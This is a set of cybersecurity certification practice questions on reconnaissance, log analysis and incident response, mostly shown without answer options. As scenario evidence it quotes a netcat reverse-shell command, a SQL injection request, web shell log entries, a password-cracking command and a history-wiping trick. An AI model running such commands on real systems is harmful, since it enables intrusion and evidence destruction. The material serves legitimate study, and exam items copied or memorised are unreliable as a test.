EXAM OBJECTIVES COVERED IN THIS CHAPTER:
1.1 Given a scenario, apply environmental reconnaissance techniques using appropriate tools and processes.
1.2 Given a scenario, analyze the results of a network reconnaissance.
1.3 Given a network-based threat, implement or recommend the appropriate response and countermeasure.
1.4 Explain the purpose of practices used to secure a corporate environment.
Charles wants to use active discovery techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria?
During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organization’s network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option?
Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine?
Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort?
A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running?
Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?
During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be?
Charles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords?
Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this?
# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
# iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP
# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW
After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to take to conduct the test?
Brian’s penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram shown here, identify what step occurs at point B in the NIST SP800-115 process flow.
Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh?
What term is often used for attackers during a penetration test?
Charles uses the following command while investigating a Windows workstation used by his organization’s vice president of finance who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organization’s cleaning staff after-hours. What does he know if the user ID shown is the only user ID able to log into the system, and he is investigating on August 12, 2017?
C:\Users\igfish>wmic netlogin get name,lastlogon,badpasswordcount
BadPasswordCount  LastLogon                  Name
                                             NT AUTHORITY\SYSTEM
0                 20170811203748.000000-240  Finance\igfish
Lauren’s honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting?
Angela is designing her organization’s data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela’s best design option?
Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here?
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1
2017-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1
2017-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1
2017-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1
2017-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1
2008-12-09 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1
2008-12-09 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1
2008-12-09 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1
2017-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1
2017-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 1
2017-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 37 48125 1
2017-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1
2017-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1
2017-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1
2017-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1
2017-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1
Rick is auditing a Cisco router configuration and notes the following line:
login block-for 120 attempts 5 within 60
What type of setting has been enabled?
As a U.S. government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as?
During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic?
Alice is conducting a penetration test of a client’s systems. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration testing process is she currently in?
What is the default nmap scan type when nmap is not provided with a scan type flag?
Isaac wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host?
Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization’s footprint the most?
Cassandra’s nmap scan of an open wireless network (192.168.10/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown?
While reviewing Shodan scan data for his organization, John notices the following entry. Which of the following is false?
Lauren has local access to a Windows workstation and wants to gather information about the organization that it belongs to. What type of information can she gain if she executes the command nbtstat -c?
Tracy believes that a historic version of her target’s website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time?
After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the tester used the -O flag. What type of information should she expect to see included in the output other than open ports?
Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process?
While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox MX Lookup tool. What can she determine from the response to her query shown here?
Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A?
As a member of a blue team, John observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test?
As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in?
As part of her malware analysis process, Caitlyn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as?
Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organization’s DMZ. How should she rate the likelihood of this occurring?
There is not enough information for Alex to provide a rating.
Use the following scenario for questions 37 through 39.
Lucy is the SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.
While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization’s New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows:
Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.
The average administrator at Lucy’s organization is responsible for 150 to 300 machines.
What danger does Lucy’s alert create?
Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
Behavior
During his analysis of a malware sample, John reviews the malware files and binaries without running them. What type of analysis is this?
The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organization’s management have expressed concerns about data remanence when Lauren’s team moves from one virtual host to another in their cloud service provider’s environment. What should she instruct her team to do to avoid this concern?
Lucca wants to prevent workstations on his network from attacking each other. If Lucca’s corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?
Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?
The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment?
Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device?
Laura’s organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization’s domain registrations. Which of the following techniques will help her organization limit this type of spam?
Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance?
Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool?
Which of the following tools can be used to passively gather the information required to generate a network topology map?
Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches?
What type of control review will focus on change management as a major element in its assessment scope?
As part of her reconnaissance process for her organization’s internal security review, Olivia uses Shodan to search for hosts within her target’s IP range. She discovers the following Shodan entry listing for one of her target’s devices. What should she do with this information?
Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
Selah has been tasked with gathering information to increase her penetration testing team’s understanding of their customer’s Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs?
While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here:
0.0.0.0 symantec.com
0.0.0.0 mcafee.com
0.0.0.0 microsoft.com
0.0.0.0 kapersky.com
Why would the malware make this change?
Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user’s desktop, she sees the following command on the screen:
user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt
What is the user attempting to do?
nmap provides a standardized way to name hardware and software that it detects. What is this called?
Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do?
Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this?
Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this?
Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using?
What two phases of the NIST penetration testing cycle are often repeated during a test?
Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization’s staff. If she wants to review the metadata from the photos, what tool can she use to do so?
Lauren’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:
at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do?
While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management?
Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network?
During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called?
Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system’s firewall for externally initiated connections?
Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?
During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened?
Adam’s port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess?
Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization’s Windows domain administrator. What information should she not report as being potentially exposed?
Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing?
Jarett needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS attack?
In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator’s manager.
At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What most likely happened?
While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess?
Adam is reviewing his organization’s security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search:
"mysqli_connect" ext:inc
If it returns data, what should he recommend in his report to management?
Rick’s manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get?
While reviewing web server logs, Danielle notices the following entry. What occurred?
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
While reviewing his Apache logs, Charles discovers the following entry. What has occurred?
10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
What two pieces of information does nmap need to estimate network path distance?
Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical items needed to uniquely identify the majority of Americans?
While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
nc -l -p 43501 < example.zip
What happened?
During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from the results provided by Zenmap?
Chris discovers the following entries in /var/log/auth.log. What is most likely occurring?
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
As part of his reconnaissance effort, Charles uses the following Google search string:
"authentication failure; logname=" ext:log;site:example.com
What will he find if he receives results from his target’s domain?
While reviewing email logs for his domain’s email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order:
...
This behavior continues for thousands of entries, resulting in many bounced email messages, but some make it through. What type of reconnaissance has Rick encountered?
Which of the following capabilities is not a typical part of an SIEM system?
What major issue would Charles face if he relied on hashing malware packages to identify malware packages?
Hashing relies on unencrypted malware samples.
Use the following network diagram and scenario to answer the next three questions:
Lauren is a security analyst who has been tasked with performing nmap scans of her organization’s network. She is a new hire and has been given this logical diagram of the organization’s network but has not been provided with any additional detail.
Lauren wants to determine what IP addresses to scan from location A. How can she find this information?
If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans?
Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact?
Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic?
Alex has been asked to investigate a call to one of his organization’s system administrators that is believed to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major client but that their laptop had died. The administrator provided a link to the file, which included the organization’s sales data for the quarter. What type of social engineering occurred?
Which of the three key objectives of cybersecurity is often ensured by using techniques like hashing and the use of tools like Tripwire?
The netflow collector that Sam’s security team uses is capable of handling 1 gigabit of traffic per second. As Sam’s organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam’s team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?
Senior C-level executives at the organization that Alex works for have received targeted phishing messages that include a fake organizational login page link and a message that states that their passwords were inadvertently reset during a scheduled maintenance window. What type of attack should Alex describe in his after action report?
Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?
Chris wants to determine what TCP ports are listening on a Windows system. What is his best option to determine this from the command line?
As part of her system hardening process for a Windows 10 workstation, Lauren runs the Microsoft Baseline System Analyzer. She sees the following result after MBSA runs. What can she determine from this scan?
While Greg was performing a port scan of a critical server system, the system administrators at his company observed the behavior shown here in their network management software suite. What action should Greg take after he is shown this chart?
An access control system that relies on the operating system to constrain the ability of a subject to perform operations is an example of what type of access control system?
While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP. What should Janet report has occurred?
[ 21/Jul/2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2017:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2017:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2017:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2017:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2017:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
Charles received a pcap file from a system administrator at a remote site who was concerned about the traffic it showed. What type of behavior should Charles report after his analysis of the file?
Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?
What U.S. government program seeks to provide trusted sources that meet the following requirements?
While reviewing netflows for a system on her network, Alice discovers the following traffic pattern. What is occurring?
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2017-07-11 04:59:32.934 0.000 TCP 10.1.1.1:34543->10.2.2.6:22 1 60 1
2017-07-11 04:59:39.730 0.000 TCP 10.1.1.1:34544->10.2.2.7:22 1 60 1
2017-07-11 04:59:46.166 0.000 TCP 10.1.1.1:34545->10.2.2.8:22 1 60 1
2017-07-11 04:59:52.934 0.000 TCP 10.1.1.1:34546->10.2.2.9:22 1 60 1
2017-07-11 05:00:06.710 0.000 TCP 10.1.1.1:34547->10.2.2.10:22 1 60 1
2017-07-11 05:00:46.160 0.000 TCP 10.1.1.1:34548->10.2.2.11:22 1 60 1
2017-07-11 05:01:32.834 0.000 TCP 10.1.1.1:34549->10.2.2.12:22 1 60 1
2017-07-11 05:01:39.430 0.000 TCP 10.1.1.1:34550->10.2.2.13:22 1 60 1
2017-07-11 05:01:46.676 0.000 TCP 10.1.1.1:34551->10.2.2.14:22 1 60 1
Chris wants to gather as much information as he can about an organization using DNS harvesting techniques. Which of the following methods will most easily provide the most useful information if they are all possible to conduct on the network he is targeting?
The national insurance company that Luke works for has experienced a breach, and Luke is attempting to categorize the impact. As he reviews the incident report, he notes that customer data that included Social Security numbers was exfiltrated from the organization. How should he categorize the impact?
As part of his reconnaissance effort, Chris enters usernames from public information about a company into a site like checkusernames.com and receives information like the results shown here. What type of action is he performing?
Geoff wants to perform passive reconnaissance as part of an evaluation of his organization’s security controls. Which of the following techniques is a valid technique to perform as part of a passive DNS assessment?
Mike’s penetration test requires him to use passive mapping techniques to discover network topology. Which of the following tools is best suited to that task?
Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwords being used to allow access to his organization’s systems. Which of the following technologies should he recommend?
While gathering DNS information about an organization, Chris discovered multiple AAAA records. What type of reconnaissance does this mean Chris may want to consider?
Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the following tools best suits her needs?
After Charles completes a topology discovery scan of his local network, he sees the Zenmap topology shown here. What can Charles determine from the Zenmap topology view?
Which of the following items is not one of the three important rules that should be established before a penetration test?
Scott is part of the white team who is overseeing his organization’s internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?
Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?
Lauren inputs the following command on a Linux system:
#echo 127.0.0.1 example.com >> /etc/hosts
What has she done?
While reviewing Apache logs, Cynthia notices the following log entries. What has occurred?
10.0.1.1 - POST /wordpress/wp-content/r57.php?1 200
10.0.1.1 - GET /wordpress/wp-content/r57.php 200
Rhonda has identified a privilege escalation flaw on the system she targeted in the first phase of her penetration test and is now ready to take the next step. According to the NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this diagram?
While conducting a penetration test, Ben executes the following command:
ifconfig eth0 hw ether 08:00:27:06:d4
What network protection is Ben most likely attempting to avoid?
When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing?
While conducting a port scan of a remote system, Henry discovers TCP port 1433 open. What service can he typically expect to run on this port?
Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, that are becoming more prevalent, and that are decreasing in occurrence. What type of analysis can she perform using this information?
While running an application vulnerability scan against one of her target organization's web servers, Andrea notices that the server's hostname is resolving to a cloudflare.com host. What does Andrea know about her scan?
While conducting active reconnaissance, Lauren discovers a web remote management application that appears to allow Windows command-line access on a server. What command can she run to quickly determine what user the service is running as?
While tracking a potential APT on her network, Cynthia discovers a network flow for her company’s central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1
Chris wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Chris accomplish this for Windows 10 Pro workstations?
After a series of compromised accounts led to her domain being blacklisted, Lauren has been asked to restore her company’s email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?
Part of Tracy’s penetration testing assignment is to evaluate the WPA2 Enterprise protected wireless networks of her target organization. What major differences exist between reconnaissance of a wired network versus a wireless network?
Ian’s company has an internal policy requiring that they perform regular port scans of all of their servers. Ian has been part of a recent effort to move his organization’s servers to an infrastructure as a service provider. What change will Ian most likely need to make to his scanning efforts?
During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system?
Cynthia knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports?
Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which of the following nmap commands will not provide her with a list of likely printers?
Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If he has no other data, what should his best guess be about what the host is?
What services will the following nmap scan test for?
nmap -sV -p 22,25,53,389 192.168.2.50/27
While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
> root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::
While conducting a topology scan of a remote web server, Susan notes that the IP addresses returned for the same DNS entry change over time. What has she likely encountered?
Attackers have been attempting to log into Alaina’s Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?
Ron is reviewing his team’s work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here?
John needs to protect his organization’s authentication system against brute-force attacks. Which of the following control pairs are best suited to preventing a brute-force attack from succeeding if ease of use and maintenance is also important?
While reviewing the command history for an administrative user, Chris discovers a suspicious command that was captured, shown here:
ln /dev/null ~/.bash_history
What action was this user attempting to perform?
While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:
service rogueservice stop
After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?
Lucca wants to validate DNS responses to ensure that they are from authoritative DNS servers. What technology can he use to do this?
Nathan has been asked to monitor and manage the environment in which a cybersecurity exercise is conducted. What team is he on?
Allan’s nmap scan includes a line that starts with cpe:/o. What type of information should he expect to gather from the entry?
Which of the following items is not typically included in the rules of engagement for a penetration test?
Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?
While scanning a network, Frank discovers a host running a service on TCP ports 1812 and 1813. What type of server has Frank most likely discovered?
While reviewing netstat output, John sees the following entries. What should his next action be?
[minesweeper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe]
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
Shane wants to conduct an nmap scan of a firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use?
Alex is observing a penetration tester who has gained access to a Windows domain controller. The penetration tester runs a program called fgdump and gathers information from the system. What type of information has the penetration tester targeted?
Which of the following commands will provide Ben with the most information about a host?
Selah suspects that the Linux system she has just logged into may be Trojaned and wants to check where the bash shell she is running is being executed from. What command should she run to determine this?
Adam needs to provide ssh access to systems behind his data center firewall. If Adam’s organization uses the system architecture shown here, what is the system at point A called?
Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?
Fred’s reconnaissance of an organization includes a search of the Censys network search engine. There, he discovers multiple certificates with validity dates as shown here:
Validity
2016-07-07 00:00:00 to 2017-08-11 23:59:59 (400 days, 23:59:59)
2016-07-08 00:00:00 to 2017-08-12 23:59:59 (400 days, 23:59:59)
2017-07-11 00:00:00 to 2018-08-15 23:59:59 (400 days, 23:59:59)
What should Fred record in his reconnaissance notes?
After receiving a penetration test report, Rick has decided to implement anti-harvesting techniques for his organization’s DNS. Which of the following sets of techniques is best suited to preventing bulk and automated information gathering?
When Casey scanned a network host, she received the results shown here. What does she know based on the scan results?
What is a document that lists sensitive data-handling rules, contact information, black-box testing, and status meeting schedules called during a penetration test?
Fred conducts an SNMP sweep of a target organization and receives no-response replies from multiple addresses that he believes belong to active hosts. What does this mean?
